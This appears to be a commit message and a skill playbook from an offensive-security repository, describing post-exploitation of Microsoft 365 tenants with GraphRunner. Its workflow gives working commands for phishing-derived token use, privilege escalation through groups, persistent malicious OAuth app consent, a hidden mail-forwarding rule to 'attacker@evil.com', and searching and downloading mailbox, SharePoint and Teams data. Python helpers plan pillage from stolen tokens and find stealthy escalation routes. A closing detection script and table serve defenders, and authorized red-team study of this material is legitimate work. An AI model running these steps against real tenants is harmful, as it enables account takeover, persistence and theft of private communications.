mukul975 8cae0648ec Add 55 new skills across 3 new domains + 6 undercovered areas (762 -> 817)
Demand-driven expansion targeting the fastest-growing 2025-2026 threat and
skills categories (ISC2/WEF/CrowdStrike/Mandiant signals):

- AI Security (NEW domain, 12 skills): LLM red-teaming with garak/PyRIT,
  prompt injection (direct/indirect/RAG), MCP tool-poisoning, agentic tool
  invocation, guardrails, model/data poisoning, system-prompt leakage,
  embedding/vector weaknesses, model extraction, continuous red-teaming
- Supply Chain Security (NEW domain, 5 skills): SBOMs, dependency confusion,
  malicious-npm triage, typosquatting, SLSA/Sigstore provenance
- Hardware & Firmware Security (NEW domain, 4 skills): CHIPSEC/UEFI audit,
  Secure Boot bypass, TPM measured-boot attestation, ESP bootkit hunting
- Identity (10): Entra ID/ROADtools, GraphRunner, AADInternals, ADCS/Certipy,
  shadow credentials, coercion, BloodHound CE, device-code phishing, SSO abuse
- Cloud-native (8): Stratus, Pacu, CloudFox, container escape, K8s RBAC,
  Falco, Trivy, kube-bench
- Offensive C2 (6): Sliver, Havoc, NetExec, DPAPI, NTLM relay ESC8, redirectors
- DFIR (6): Hayabusa, Chainsaw, KAPE, Velociraptor, EZ Tools, Plaso
- Backfill (4): OpenCTI, MISP, honeytokens, post-quantum crypto migration

Each skill follows the repo taxonomy (SKILL.md + references/{standards,api-reference}.md
+ scripts/agent.py + LICENSE), with researched real tool commands (no placeholders),
complete frontmatter, and ATT&CK/ATLAS + NIST CSF mappings. Updates README domain
table, skill count, and index.json.
2026-06-22 19:08:16 +02:00


---
name: post-exploiting-microsoft-graph-with-graphrunner
description: Perform recon, persistence, privilege escalation, and data search via the Microsoft Graph API using GraphRunner.
domain: cybersecurity
subdomain: identity-access-management
tags:
  - red-team
  - microsoft-graph
  - graphrunner
  - entra-id
  - oauth-abuse
  - account-manipulation
  - post-exploitation
  - m365
version: 1.0
author: mahipal
license: Apache-2.0
nist_csf: PR.AA-05
mitre_attack: T1098
---

Post-Exploiting Microsoft Graph with GraphRunner

Authorized use only: GraphRunner performs offensive actions against live Microsoft 365 / Entra ID tenants — deploying OAuth apps, cloning groups, adding members, and reading mailboxes, SharePoint, and Teams. Run it only against tenants you own or are explicitly authorized in writing to test. Unauthorized use is illegal.

Overview

GraphRunner (Beau Bullock / Black Hills Information Security) is a PowerShell post-exploitation toolset built entirely on the Microsoft Graph API. Given a foothold token, it performs recon, establishes persistence, escalates privilege, and pillages M365 data, all through Graph: the traffic looks like ordinary first-party client activity, and because the tool runs from any host that holds a token, endpoint controls on the victim's devices never see it. It is the natural follow-on to credential/token theft (e.g., device-code phishing or ROADtools): once you hold Graph access, GraphRunner operationalizes it.

The toolset is a single PowerShell module (GraphRunner.ps1) exposing dozens of functions grouped by purpose:

  • Authentication: Get-GraphTokens (device-code login), Invoke-RefreshGraphTokens, Invoke-AutoTokenRefresh, Invoke-ImportTokens, Invoke-RefreshToSharePointToken.
  • Recon & Enumeration: Invoke-GraphRecon (tenant/user permission summary), Invoke-DumpCAPS (conditional-access policies), Invoke-DumpApps (app registrations / consent grants), Get-AzureADUsers, Get-SecurityGroups, Get-UpdatableGroups, Get-DynamicGroups, Invoke-SearchUserAttributes, Invoke-GraphOpenInboxFinder, Find-PermissiveCalendars.
  • Persistence: Invoke-InjectOAuthApp (deploy a malicious OAuth app for consent-grant persistence), Invoke-CreateInboxForwardingRule.
  • Privilege Escalation: Get-UpdatableGroups, Invoke-AddGroupMember, Invoke-SecurityGroupCloner, Invoke-InviteGuest.
  • Pillage / Data Search: Invoke-SearchMailbox, Invoke-SearchSharePointAndOneDrive, Invoke-SearchTeams, Get-TeamsChat, Invoke-DriveFileDownload.
  • Master runner: Invoke-GraphRunner runs an automated recon-and-pillage pass; List-GraphRunnerModules prints all modules.

This maps to MITRE ATT&CK T1098 — Account Manipulation: GraphRunner manipulates accounts, groups, and OAuth grants (adding members, injecting apps, cloning groups, inviting guests) to maintain and escalate access in the cloud identity plane.

When to Use

  • After obtaining a valid Microsoft Graph access/refresh token during an authorized M365/Entra engagement.
  • When mapping tenant permissions, conditional-access policies, and OAuth app exposure.
  • When establishing cloud persistence via OAuth consent grants or inbox forwarding (in scope).
  • When demonstrating privilege escalation through updatable/dynamic groups.
  • When searching mailboxes, SharePoint/OneDrive, and Teams for sensitive data to evidence impact.

Prerequisites

  • Written authorization and scope for the target tenant.
  • A Graph token foothold (from Get-GraphTokens device-code login, or imported tokens).
  • PowerShell 5.1+ or PowerShell 7 (cross-platform).
  • The module list changes between releases; confirm each function name and its parameters with List-GraphRunnerModules and Get-Help before scripting against it.

# Clone and import the module
git clone https://github.com/dafthack/GraphRunner.git
cd GraphRunner
Import-Module .\GraphRunner.ps1

# List every available module
List-GraphRunnerModules

Objectives

  • Authenticate to Microsoft Graph and maintain tokens via refresh.
  • Enumerate tenant users, groups, CA policies, and OAuth apps.
  • Identify updatable groups and demonstrate privilege escalation.
  • Establish persistence via an injected OAuth app and/or inbox forwarding rule.
  • Search mailboxes, SharePoint/OneDrive, and Teams for sensitive content.

MITRE ATT&CK Mapping

| ID | Tactic | Official Technique Name | Role in this skill |
|---|---|---|---|
| T1098 | Persistence | Account Manipulation | Add group members, clone groups, invite guests to retain/escalate access |
| T1098.003 | Privilege Escalation | Account Manipulation: Additional Cloud Roles | Adding members to privileged/updatable groups |
| T1528 | Credential Access | Steal Application Access Token | Get-GraphTokens device-code token acquisition; Invoke-InjectOAuthApp illicit consent grant |
| T1550.001 | Defense Evasion, Lateral Movement | Use Alternate Authentication Material: Application Access Token | Every subsequent module call reuses the stolen or consented Graph token instead of a password |
| T1087.004 | Discovery | Account Discovery: Cloud Account | Get-AzureADUsers, Invoke-SearchUserAttributes |
| T1114.002 | Collection | Email Collection: Remote Email Collection | Invoke-SearchMailbox over Graph |
| T1114.003 | Collection | Email Collection: Email Forwarding Rule | Invoke-CreateInboxForwardingRule external forwarding |

Workflow

Step 1: Authenticate and refresh tokens

# Device-code login; complete the code at https://microsoft.com/devicelogin.
# By default the request goes out under the Microsoft Office first-party client ID
# (d3590ed6-52b3-4102-aeff-aad2292ab01c). The resulting token pair is stored in the
# global $tokens variable that every other module takes via -Tokens.
Get-GraphTokens

# Refresh the access token when it expires (uses $tokens.refresh_token)
Invoke-RefreshGraphTokens

# Keep tokens fresh automatically during a long operation
Invoke-AutoTokenRefresh

# Import tokens captured elsewhere (e.g., from ROADtools). The access token must have been
# issued for the Graph resource, otherwise the Graph modules get 401/403 responses.
Invoke-ImportTokens -AccessToken $at -RefreshToken $rt
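Before pointing the enumeration modules at a tenant, it is worth knowing what the token you hold actually permits. The helper below is an added example, not GraphRunner code: it decodes the claims of a Graph access token without verifying its signature and reports audience, tenant, client ID, delegated scopes versus application roles, remaining lifetime, and an estimate of which workflow steps the token can drive. The scope-per-module table is my assumption, derived from the Graph endpoints those modules read; GraphRunner publishes no such mapping. The sample token is constructed with a throwaway HMAC signature purely to have a syntactically valid JWT (real Entra tokens are RS256-signed and cannot be produced this way).

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Optional

# Audience values Entra ID issues for Microsoft Graph: the URL form and Graph's app ID.
GRAPH_AUDIENCES = {"https://graph.microsoft.com", "00000003-0000-0000-c000-000000000000"}

# Assumed minimum delegated scopes per workflow step (any one in the set suffices), derived
# from the Graph endpoints the modules read. GraphRunner does not publish such a table.
STEP_SCOPES = {
    "Invoke-DumpCAPS": {"Policy.Read.All", "Policy.Read.ConditionalAccess"},
    "Invoke-AddGroupMember": {"GroupMember.ReadWrite.All", "Group.ReadWrite.All",
                              "Directory.ReadWrite.All", "Directory.AccessAsUser.All"},
    "Invoke-SearchMailbox": {"Mail.Read", "Mail.ReadWrite"},
    "Invoke-SearchSharePointAndOneDrive": {"Sites.Read.All", "Sites.ReadWrite.All",
                                           "Files.Read.All", "Files.ReadWrite.All"},
    "Invoke-SearchTeams": {"Chat.Read", "Chat.ReadWrite", "ChannelMessage.Read.All"},
}


def _b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def decode_jwt_unverified(token: str) -> dict:
    """Payload claims of a compact JWT. Deliberately no signature check: this inspects a
    token you already hold; it must never be used to trust a token someone hands you."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWS (expected header.payload.signature)")
    return json.loads(_b64url_decode(parts[1]))


def inspect_graph_token(token: str, now: Optional[float] = None) -> dict:
    claims = decode_jwt_unverified(token)
    now = time.time() if now is None else now
    delegated = "scp" in claims                     # scp = delegated scopes, roles = app-only
    perms = set(claims["scp"].split()) if delegated else set(claims.get("roles", []))
    return {
        "tenant": claims.get("tid"),
        "principal": claims.get("upn") or claims.get("unique_name") or claims.get("oid"),
        "client_app_id": claims.get("appid") or claims.get("azp"),
        "audience_is_graph": claims.get("aud") in GRAPH_AUDIENCES,
        "token_type": "delegated" if delegated else "application",
        "permissions": sorted(perms),
        "seconds_left": int(claims.get("exp", 0) - now),
        "usable_steps": sorted(step for step, need in STEP_SCOPES.items() if perms & need),
    }


def make_sample_token(claims: dict) -> str:
    """CONSTRUCTED: HS256 with a throwaway key, only so the JWT is well-formed.
    Real Entra tokens are RS256-signed by Microsoft's keys."""
    header = {"typ": "JWT", "alg": "HS256"}
    signing_input = ".".join(_b64url_encode(json.dumps(p, separators=(",", ":")).encode())
                             for p in (header, claims))
    sig = hmac.new(b"not-a-real-key", signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{_b64url_encode(sig)}"


# Constructed claims resembling a delegated Graph token issued to the Microsoft Office
# first-party client (GraphRunner's default client ID) for a tenant user.
SAMPLE_CLAIMS = {
    "aud": "https://graph.microsoft.com",
    "tid": "11111111-2222-3333-4444-555555555555",
    "appid": "d3590ed6-52b3-4102-aeff-aad2292ab01c",
    "upn": "j.doe@contoso.example",
    "scp": "Mail.Read Files.Read.All Sites.Read.All User.Read Directory.AccessAsUser.All",
    "exp": 1_700_003_600,
}

if __name__ == "__main__":
    token = make_sample_token(SAMPLE_CLAIMS)
    print(json.dumps(inspect_graph_token(token, now=1_700_000_000), indent=2))
```

Run it against `$tokens.access_token` exported from the PowerShell session: a token whose `audience_is_graph` is false (for example one issued for Outlook or ARM) needs Invoke-RefreshGraphTokens or one of the Invoke-RefreshTo* modules first, and an empty `usable_steps` list means the client ID the token was minted for carries no useful delegated scopes, so a different client or an injected app is needed before pillage can start.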

Step 2: Recon and enumeration

# High-level tenant + current-user permission recon
Invoke-GraphRecon -Tokens $tokens -PermissionEnum

# Dump conditional-access policies
Invoke-DumpCAPS -Tokens $tokens -ResolveGuids

# Enumerate app registrations, service principals, and consent grants
Invoke-DumpApps -Tokens $tokens

# Enumerate all users and security groups
Get-AzureADUsers -Tokens $tokens -OutFile users.txt
Get-SecurityGroups -Tokens $tokens

Step 3: Search user attributes for secrets

# Hunt across all user attributes for terms like "password"
Invoke-SearchUserAttributes -Tokens $tokens -SearchTerm "password"

Step 4: Privilege escalation via updatable groups

# Find groups the current principal can modify directly
Get-UpdatableGroups -Tokens $tokens

# Add yourself (or a controlled account) to a target group
Invoke-AddGroupMember -Tokens $tokens -GroupId <group-guid> -UserId <user-guid>

# Clone a privileged security group's membership into a new group you control
Invoke-SecurityGroupCloner -Tokens $tokens
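Get-DynamicGroups matters for escalation for a different reason than Get-UpdatableGroups: membership in a dynamic group is computed from user attributes, so anyone who can influence an attribute a rule tests (the display name or mail address of a guest invited with Invoke-InviteGuest, or an attribute the user can self-edit) joins the group without holding any group write permission. The evaluator below is an added example, not GraphRunner code. It implements a subset of the Entra membership-rule grammar (`-eq`, `-ne`, `-contains`, `-notContains`, `-startsWith`, `-match`, `-and`, `-or`, `-not`, parentheses, string/boolean/null literals) so that exported rules can be tested offline against a candidate attribute set before any invite or attribute change is made. Treating string comparisons as case-insensitive is a simplification I assume here; the groups and the guest attributes are constructed.

```python
import re

# Tokens: parens, double-quoted strings, -operators (-eq, -and, ...) and words (user.mail, true).
TOKEN_RE = re.compile(r'\(|\)|"[^"]*"|-[A-Za-z]+|[A-Za-z][\w.]*')


def tokenize(rule: str) -> list:
    tokens, pos, rule = [], 0, rule.strip()
    while pos < len(rule):
        if rule[pos].isspace():
            pos += 1
            continue
        m = TOKEN_RE.match(rule, pos)
        if not m:
            raise ValueError(f"unexpected character at {pos}: {rule[pos]!r}")
        tokens.append(m.group())
        pos = m.end()
    return tokens


def literal(tok: str):
    """Right-hand side of a comparison: "string", true/false or null (the supported subset)."""
    if tok.startswith('"'):
        return tok[1:-1]
    return {"true": True, "false": False, "null": None}[tok.lower()]


def compare(lhs, op: str, rhs) -> bool:
    # Assumed simplification: string comparisons are case-insensitive.
    if op in ("-eq", "-ne"):
        equal = (lhs is rhs) if lhs is None or rhs is None else str(lhs).lower() == str(rhs).lower()
        return equal if op == "-eq" else not equal
    if lhs is None:                      # a missing attribute satisfies no other operator
        return False
    left, right = str(lhs).lower(), str(rhs).lower()
    if op == "-contains":
        return right in left
    if op == "-notcontains":
        return right not in left
    if op == "-startswith":
        return left.startswith(right)
    if op == "-match":
        return re.search(str(rhs), str(lhs)) is not None
    raise ValueError(f"unsupported operator {op}")


class RuleParser:
    """Recursive descent over one rule; precedence -not > -and > -or."""

    def __init__(self, rule: str, user: dict):
        self.toks, self.i = tokenize(rule), 0
        self.user = {k.lower(): v for k, v in user.items()}

    def peek(self):
        return self.toks[self.i].lower() if self.i < len(self.toks) else None

    def take(self) -> str:
        if self.i >= len(self.toks):
            raise ValueError("unexpected end of rule")
        self.i += 1
        return self.toks[self.i - 1]

    def parse(self) -> bool:
        value = self.expr()
        if self.i != len(self.toks):
            raise ValueError(f"trailing tokens: {self.toks[self.i:]}")
        return value

    def expr(self) -> bool:              # term (-or term)*
        value = self.term()
        while self.peek() == "-or":
            self.take()
            value = self.term() or value
        return value

    def term(self) -> bool:              # factor (-and factor)*
        value = self.factor()
        while self.peek() == "-and":
            self.take()
            value = self.factor() and value
        return value

    def factor(self) -> bool:            # -not factor | ( expr ) | user.<attr> <op> <literal>
        if self.peek() == "-not":
            self.take()
            return not self.factor()
        if self.peek() == "(":
            self.take()
            value = self.expr()
            if self.take() != ")":
                raise ValueError("missing ')'")
            return value
        prop = self.take()
        if not prop.lower().startswith("user."):
            raise ValueError(f"expected user.<attribute>, got {prop!r}")
        op = self.take().lower()
        return compare(self.user.get(prop[5:].lower()), op, literal(self.take()))


def matching_groups(groups: list, user: dict) -> list:
    """Display names of dynamic groups whose membershipRule the attribute set satisfies."""
    return [g["displayName"] for g in groups if RuleParser(g["membershipRule"], user).parse()]


# Constructed sample in the shape of Graph group objects (displayName, membershipRule).
SAMPLE_DYNAMIC_GROUPS = [
    {"displayName": "All Engineering",
     "membershipRule": '(user.department -eq "Engineering") -and (user.accountEnabled -eq true)'},
    {"displayName": "Partner Portal Admins",
     "membershipRule": '(user.userType -eq "Guest") -and (user.mail -contains "@partner.example")'},
    {"displayName": "Contractors",
     "membershipRule": 'user.jobTitle -startsWith "Contract" -or user.displayName -match "\\(ext\\)"'},
]

# Constructed attributes of a guest the operator invites (userType and mail follow from the invite).
INVITED_GUEST = {"userType": "Guest", "mail": "attacker@partner.example", "accountEnabled": True,
                 "displayName": "Alex Bot (ext)", "jobTitle": None}

if __name__ == "__main__":
    print(matching_groups(SAMPLE_DYNAMIC_GROUPS, INVITED_GUEST))
```

Feed it the displayName and membershipRule fields from Get-DynamicGroups output and the attribute set you can actually produce; any rule that matches is a group you join with no Invoke-AddGroupMember call at all, which is also the quietest path because the membership change is performed by the directory's own processing, not by your token.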

Step 5: Persistence

# Deploy a malicious OAuth app; the module prints the consent URL to deliver to the target,
# and once consent is granted the app's access no longer depends on the user's password
Invoke-InjectOAuthApp -Tokens $tokens -AppName "Demo App" -ReplyUrl "https://localhost" -Scope "openid profile offline_access Mail.Read"

# Create a hidden inbox forwarding rule on a target mailbox
Invoke-CreateInboxForwardingRule -Tokens $tokens -ForwardTo "attacker@evil.com" -RuleName "Sync"

Step 6: Pillage M365 data

# Search a mailbox (or all reachable mailboxes) for sensitive terms
Invoke-SearchMailbox -Tokens $tokens -SearchTerm "password" -MessageCount 100 -OutFile mail.csv

# Search SharePoint and OneDrive content
Invoke-SearchSharePointAndOneDrive -Tokens $tokens -SearchTerm "secret"

# Download a discovered file
Invoke-DriveFileDownload -Tokens $tokens -DriveItemIDs "<drive-id>:<item-id>" -FileName loot.docx

# Search Teams messages
Invoke-SearchTeams -Tokens $tokens -SearchTerm "vpn"

Step 7: Automated full pass

# Run the orchestrated recon + pillage workflow end to end
Invoke-GraphRunner -Tokens $tokens

Tools and Resources

| Tool | Purpose | Primary Source |
|---|---|---|
| GraphRunner (repo) | PowerShell Graph post-exploitation toolset | https://github.com/dafthack/GraphRunner |
| GraphRunner wiki | Per-module usage guide | https://github.com/dafthack/GraphRunner/wiki |
| BHIS GraphRunner blog | Tool release + walkthrough | https://www.blackhillsinfosec.com/introducing-graphrunner/ |
| Microsoft Graph API | API reference for the underlying calls | https://learn.microsoft.com/graph/api/overview |
| ROADtools | Upstream token acquisition / device-code phishing | https://github.com/dirkjanm/ROADtools |

OPSEC and Detection Considerations

GraphRunner is designed to blend with legitimate Graph traffic, but its actions leave a trail defenders can hunt:

| GraphRunner action | Telemetry source | What the defender sees |
|---|---|---|
| Get-GraphTokens (device code) | Entra sign-in logs | Sign-in with authenticationProtocol = deviceCode under GraphRunner's default client ID, the Microsoft Office first-party app (d3590ed6-52b3-4102-aeff-aad2292ab01c), from a device/IP the user has not used before; compare the appId against the clients your admins actually use for device-code logins |
| Invoke-InjectOAuthApp | Entra audit logs | "Add application" + "Consent to application" events with broad delegated scopes |
| Invoke-AddGroupMember / Invoke-SecurityGroupCloner | Entra audit logs | "Add member to group" on privileged/role-assignable groups |
| Invoke-CreateInboxForwardingRule | M365 audit + mailbox rules | New inbox rule forwarding externally (often hidden) |
| Invoke-SearchMailbox / Invoke-SearchSharePointAndOneDrive | MicrosoftGraphActivityLogs | High-volume $search calls against /messages and Drive endpoints |

To reduce noise during an authorized engagement, scope searches with -MessageCount, avoid role-assignable group changes unless required, and clean up everything you created: remove injected apps with Invoke-DeleteOAuthApp, delete forwarding rules, and remove any group members or cloned groups you added. Record each object ID at creation time so cleanup does not depend on re-enumerating the tenant.
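To make the detection table concrete, the script below is an added example (not from GraphRunner or BHIS) that runs four of those detections over a handful of constructed records: Entra sign-in and audit-log events trimmed to the fields the rules read (authenticationProtocol, appId, activityDisplayName, initiatedBy, targetResources, modifiedProperties), plus an Exchange New-InboxRule audit record. The `source` field, the allow-list of expected device-code clients, the role-assignable group names and the tenant domains are my assumptions; a real deployment pulls them from its own inventory, and the records themselves are constructed and simplified.

```python
import json
import re
from typing import Optional

# Assumed tenant inventory; a real deployment pulls these from its own records.
TENANT_DOMAINS = {"contoso.example"}
EXPECTED_DEVICE_CODE_CLIENTS = {"04b07795-8ddb-461a-bbee-02f9e1bf7b46"}  # Azure CLI, used by admins here
ROLE_ASSIGNABLE_GROUPS = {"Tier0-Admins", "Exchange-Admins"}
SENSITIVE_SCOPES = {"Mail.Read", "Mail.ReadWrite", "Files.Read.All", "Sites.Read.All",
                    "Directory.ReadWrite.All", "MailboxSettings.ReadWrite"}
FORWARDING_PARAMS = {"ForwardTo", "ForwardAsAttachmentTo", "RedirectTo"}


def is_external(address: str) -> bool:
    return address.rsplit("@", 1)[-1].lower() not in TENANT_DOMAINS


def triage_record(rec: dict) -> Optional[dict]:
    """Apply the four detections to one record; return a finding or None."""
    src = rec.get("source")
    if (src == "SignInLogs" and rec.get("authenticationProtocol") == "deviceCode"
            and rec.get("appId") not in EXPECTED_DEVICE_CODE_CLIENTS):
        return {"rule": "device-code sign-in from unexpected client",
                "user": rec.get("userPrincipalName"), "appId": rec.get("appId"),
                "ip": rec.get("ipAddress")}
    if src == "AuditLogs":
        activity = rec.get("activityDisplayName")
        actor = rec.get("initiatedBy", {}).get("user", {}).get("userPrincipalName")
        targets = rec.get("targetResources", [])
        names = {t.get("displayName") for t in targets}
        if activity == "Consent to application":
            # ConsentAction.Permissions carries free text that embeds "Scope: a b c";
            # pulling out word-like tokens is enough to recover the scope names.
            granted = set()
            for t in targets:
                for prop in t.get("modifiedProperties", []):
                    if prop.get("displayName") == "ConsentAction.Permissions":
                        granted |= set(re.findall(r"[A-Za-z][\w.]*", prop.get("newValue", "")))
            hits = granted & SENSITIVE_SCOPES
            if hits:
                return {"rule": "consent to application with sensitive scopes", "user": actor,
                        "app": targets[0].get("displayName") if targets else None,
                        "scopes": sorted(hits)}
        if activity == "Add member to group" and names & ROLE_ASSIGNABLE_GROUPS:
            return {"rule": "member added to role-assignable group", "user": actor,
                    "group": sorted(names & ROLE_ASSIGNABLE_GROUPS)[0]}
    if src == "ExchangeAudit" and rec.get("Operation") == "New-InboxRule":
        external = [p["Value"] for p in rec.get("Parameters", [])
                    if p.get("Name") in FORWARDING_PARAMS and is_external(p["Value"])]
        if external:
            return {"rule": "inbox rule forwarding externally", "user": rec.get("UserId"),
                    "forward_to": external}
    return None


def triage(lines) -> list:
    """Parse JSON lines and keep every record that produced a finding."""
    return [f for f in (triage_record(json.loads(line)) for line in lines) if f]


# CONSTRUCTED records, simplified to the fields the rules read; "source" is my own field.
SAMPLE_LOG_LINES = [
    json.dumps({"source": "SignInLogs", "userPrincipalName": "admin@contoso.example",
                "authenticationProtocol": "deviceCode",
                "appId": "04b07795-8ddb-461a-bbee-02f9e1bf7b46", "ipAddress": "203.0.113.10"}),
    json.dumps({"source": "SignInLogs", "userPrincipalName": "j.doe@contoso.example",
                "authenticationProtocol": "deviceCode",
                "appId": "d3590ed6-52b3-4102-aeff-aad2292ab01c", "ipAddress": "198.51.100.7"}),
    json.dumps({"source": "AuditLogs", "activityDisplayName": "Consent to application",
                "initiatedBy": {"user": {"userPrincipalName": "j.doe@contoso.example"}},
                "targetResources": [{"displayName": "Demo App", "modifiedProperties": [
                    {"displayName": "ConsentAction.Permissions",
                     "newValue": "[] -> [[ConsentType: Principal, Scope: openid profile Mail.Read]]"}]}]}),
    json.dumps({"source": "AuditLogs", "activityDisplayName": "Add member to group",
                "initiatedBy": {"user": {"userPrincipalName": "j.doe@contoso.example"}},
                "targetResources": [{"displayName": "J. Doe"}, {"displayName": "Tier0-Admins"}]}),
    json.dumps({"source": "ExchangeAudit", "Operation": "New-InboxRule", "UserId": "j.doe@contoso.example",
                "Parameters": [{"Name": "Name", "Value": "Sync"},
                               {"Name": "ForwardTo", "Value": "attacker@evil.com"}]}),
    json.dumps({"source": "AuditLogs", "activityDisplayName": "Add member to group",
                "initiatedBy": {"user": {"userPrincipalName": "hr@contoso.example"}},
                "targetResources": [{"displayName": "New Hire"}, {"displayName": "Marketing"}]}),
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG_LINES):
        print(json.dumps(finding))
```

The first record (an admin's Azure CLI device-code login) and the last (a routine Marketing group add) produce nothing; the four GraphRunner-shaped records each produce one finding. In production the same four rules belong in the SIEM's query language over the real SignInLogs, AuditLogs and Exchange audit tables, with the allow-lists maintained as watchlists rather than literals.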

Validation Criteria

  • Graph tokens obtained via Get-GraphTokens and refreshed successfully.
  • Tenant recon completed (Invoke-GraphRecon, Invoke-DumpCAPS, Invoke-DumpApps).
  • Users and security groups enumerated.
  • User attributes searched for embedded secrets.
  • Updatable groups identified and a controlled privilege escalation demonstrated.
  • Persistence established (OAuth app injection and/or inbox forwarding) where in scope.
  • Mailbox, SharePoint/OneDrive, and Teams searched for sensitive data.
  • All actions, object IDs, and evidence logged for the engagement report and cleanup.